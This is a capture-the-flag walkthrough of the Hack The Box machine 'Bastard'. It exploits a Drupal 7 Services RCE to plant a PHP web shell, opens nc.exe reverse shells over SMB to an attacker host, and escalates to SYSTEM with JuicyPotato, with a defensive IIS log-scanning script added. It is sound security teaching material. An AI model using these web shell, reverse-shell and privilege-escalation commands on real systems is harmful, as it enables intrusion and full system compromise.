# Bastard

![](/files/oNSvFnf0BAeXm1Cxw3CL)

## Enumeration

As usual, we start with an nmap scan to find the open ports on the target machine.

The following nmap command scans the whole port range of the target quickly and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.9 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest of the nmap timing templates.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

```
# Nmap 7.92 scan initiated Mon Mar  7 14:42:44 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.058s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

# Nmap done at Mon Mar  7 14:43:10 2022 -- 1 IP address (1 host up) scanned in 26.74 seconds
```

As we see, ports *80*, *135* and *49154* are open. Let's try to obtain more information about the services and versions running on those ports.

> nmap -sC -sV -p80,135,49154 10.10.10.9 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Mon Mar  7 14:45:20 2022 as: nmap -sCV -p80,135,49154 -oN targeted 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar  7 14:46:25 2022 -- 1 IP address (1 host up) scanned in 65.35 seconds
```

## Exploitation

On port *80* we have a *Drupal 7*. Let's look for any common exploit for that version of *Drupal*.

> searchsploit Drupal 7.X

```
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 7.x Module Services - Remote Code Execution                                                                                                                                                         | php/webapps/41564.php
Drupal < 7.34 - Denial of Service                                                                                                                                                                          | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                                                                                   | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                                                                                                | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                                                        | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                                    | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                                                                                                           | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                                                                                                      | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                                                                                                             | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                                                                                                         | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                                                                                                          | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                                                                                                                     | php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                                                                                                              | php/remote/40144.php
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                                                                                                          | php/remote/40130.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

Let's move the first exploit to our current folder.

> searchsploit -m php/webapps/41564.php

* `-m` **copies** an exploit to the current working directory.

```
  Exploit: Drupal 7.x Module Services - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/41564
     Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: C++ source, ASCII text

Copied to: /home/alfa8sa/HTB/machines/bastard/41564.php
```

Before executing it, we will have to change a few things.

> nano 41564.php

First, let's change the `$url` variable with the URL of the *Bastard* machine.

```php
$url = 'http://10.10.10.9';
```

Then we'll have to verify that the `$endpoint_path` exists. If we browse to `http://10.10.10.9/rest_endpoint` we get an error saying that the requested page doesn't exist.

![](/files/mqHrZgTKxjZCmCdwjKWB)

But don't worry: if we browse to the `http://10.10.10.9/rest` directory instead, we get a message.

![](/files/go3Z8Yk4a5wo3lbrkGve)

So on the *PHP* script we'll have to change the `$endpoint_path` variable to `/rest`.

```php
$endpoint_path = '/rest';
```

Finally, we'll have to modify the `$file` variable by changing the *filename* and *data* fields. In the *data* field we put a small *PHP* web shell that runs, at the system level, whatever we pass through the `cmd` parameter.

```php
$file = [
    'filename' => 'rce.php',
    'data' => '<?php echo "<pre>" . shell_exec($_REQUEST[\'cmd\']) . "</pre>";?>'
];
```

Now we can run the script.

> php 41564.php

```
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce


#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/rce.php
```

Now we could access `http://10.10.10.9/rce.php` and execute commands with the `?cmd` parameter.

> curl <http://10.10.10.9/rce.php?cmd=whoami>

```
<pre>nt authority\iusr
</pre> 
```

Time to get a shell. First, let's set a *netcat* listener on port *4444*.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Then you'll have to download [nc.exe](https://github.com/int0x33/nc.exe/) and set an *SMB* server with the *impacket-smbserver* tool in the directory where the binary is located.

> impacket-smbserver smbFolder $(pwd) -smb2support

Finally, if we request the previous *URL* pointing `cmd` at the *nc.exe* binary in the shared folder, we get a reverse shell back as the `nt authority\iusr` user, and we can grab the user flag.

> http://10.10.10.9/rce.php?cmd=\\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444

```
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49422
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

C:\inetpub\drupal-7.54>type \users\dimitris\desktop\user.txt
type \users\dimitris\desktop\user.txt
9026b4905694e46ffc32a38fa2571407
```
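As an added defender-side example (not part of the original writeup), the following Python script scans IIS W3C log lines for the traffic pattern this chain leaves behind: a request to an unexpected `.php` file at the webroot, a `cmd=` query parameter, a UNC path pointing at an external host, and `nc.exe -e`. The log field order, the known Drupal root files and the sample lines are assumptions modelled on the requests shown above.

```python
import re
from urllib.parse import unquote

# Constructed sample IIS W3C log lines (not real logs from the Bastard machine).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2022-03-07 13:50:01 10.10.10.9 POST /rest/user/login - 10.10.14.11 200
2022-03-07 13:50:02 10.10.10.9 GET /rce.php cmd=whoami 10.10.14.11 200
2022-03-07 13:51:10 10.10.10.9 GET /rce.php cmd=%5C%5C10.10.14.11%5CsmbFolder%5Cnc.exe+-e+cmd+10.10.14.11+4444 10.10.14.11 200
2022-03-07 13:52:00 10.10.10.9 GET /index.php q=node/1 10.10.14.20 200
"""

# PHP files that legitimately live in a Drupal 7 webroot (assumed allow-list).
KNOWN_ROOT_PHP = {"/index.php", "/cron.php", "/install.php",
                  "/update.php", "/authorize.php", "/xmlrpc.php"}

# Indicators of the web shell and of the nc.exe-over-SMB step, applied to the decoded query.
RULES = [
    ("shell command parameter", re.compile(r"(^|&)cmd=", re.I)),
    ("UNC path in query", re.compile(r"\\\\\d{1,3}(\.\d{1,3}){3}\\")),
    ("netcat reverse shell", re.compile(r"nc(64)?\.exe.*\s-e\s", re.I)),
]

def parse_iis_line(line):
    """Split one W3C line into the eight fields declared by the #Fields header above."""
    parts = line.split()
    if len(parts) != 8:
        return None
    keys = ["date", "time", "s_ip", "method", "stem", "query", "c_ip", "status"]
    return dict(zip(keys, parts))

def scan_iis_log(text):
    """Return (line_no, client_ip, uri_stem, [reasons]) for every suspicious request."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.startswith("#"):
            continue
        rec = parse_iis_line(line)
        if rec is None:
            continue
        # IIS stores the query URL-encoded; decode '+' and %XX before matching.
        query = unquote(rec["query"].replace("+", " "))
        reasons = [name for name, rx in RULES if rx.search(query)]
        stem = rec["stem"].lower()
        if re.fullmatch(r"/[^/]+\.php", stem) and stem not in KNOWN_ROOT_PHP:
            reasons.insert(0, "unexpected webroot php file")
        if reasons:
            hits.append((no, rec["c_ip"], rec["stem"], reasons))
    return hits

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```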

## Privilege Escalation

Let's see what privileges the user `nt authority\iusr` has.

> whoami /priv

```
PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
```

If a user has the *SeImpersonatePrivilege*, the first thing that comes to mind is *JuicyPotato*.

{% hint style="info" %}
**JuicyPotato** is a local privilege escalation tool for Windows that abuses COM objects to escalate privileges. It requires *SeImpersonate* or *SeAssignPrimaryToken* to be enabled.

<https://github.com/ohpe/juicy-potato>
{% endhint %}

To escalate privileges, we'll have to transfer `JuicyPotato.exe` to the victim machine. Let's start a Python *HTTP* server in the directory where we have the *JuicyPotato* binary.

> python -m SimpleHTTPServer

And download the binary from the desktop folder of the `nt authority\iusr` user.

> certutil.exe -f -urlcache -split <http://10.10.14.11:8000/JuicyPotato.exe> JuicyPotato.exe

Before executing the `JuicyPotato.exe` binary, let's set another netcat listener on port *5555* to catch a reverse shell as the `NT AUTHORITY\SYSTEM` user.

> nc -lvnp 5555

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

And let's set an SMB server on the directory where the `nc.exe` binary is located.

> impacket-smbserver smbFolder $(pwd) -smb2support

Finally, let's run the *JuicyPotato* binary to get a shell as the `NT AUTHORITY\SYSTEM` user.

> JuicyPotato.exe -t \* -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555"

* `-t` **createprocess** call.
* `-l` COM server listen **port**.
* `-p` **program** to launch.
* `-a` specify command **arguments**.

```
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
COM -> recv failed with error: 10038
```

But we get an error. This happens because *JuicyPotato* is using its default *CLSID*, which is not valid for this OS version. If we check the system information, we'll see the machine is a `Microsoft Windows Server 2008 R2 Datacenter`.

> systeminfo

```
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          7/3/2022, 3:48:18 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.585 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.606 MB
Virtual Memory: In Use:    489 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
```

So we have to change the *CLSID* to a valid one. You can check a Windows 8 *CLSID* list [here](https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_8.1_Enterprise).

{% hint style="info" %}
The Class ID, or **CLSID**, is a globally unique identifier for an application component (a COM class) in Windows. In practice, this means all registry entries for an application component can usually be found under the registry key `HKEY_CLASSES_ROOT\CLSID\{CLSID value}`.
{% endhint %}

If we change it to `{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}`, we should get the reverse shell. Then all we have to do is reap the harvest and take the root flag.

> JuicyPotato.exe -t \* -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555" -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"

* `-t` **createprocess** call.
* `-l` COM server listen **port**.
* `-p` **program** to launch.
* `-a` specify command **arguments**.
* `-c` use **CLSID**.

```
listening on [any] 5555 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49455
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
1d20b21916f1064ba7b0232d6725edeb
```
